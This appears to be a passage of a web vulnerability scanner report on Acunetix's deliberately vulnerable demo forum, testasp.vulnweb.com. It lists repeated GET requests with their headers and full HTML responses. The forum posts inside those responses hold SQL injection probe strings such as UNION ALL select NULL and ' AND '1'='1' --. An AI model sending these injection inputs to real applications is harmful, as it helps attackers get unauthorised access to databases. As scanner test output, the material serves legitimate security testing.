type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:28 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4150 |
| Response Body - size: 4,150 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:32 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4151 |
| Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4151 |
| Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4132 |
| Response Body - size: 4,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr> </table> <!-- tinyMCE --> <script 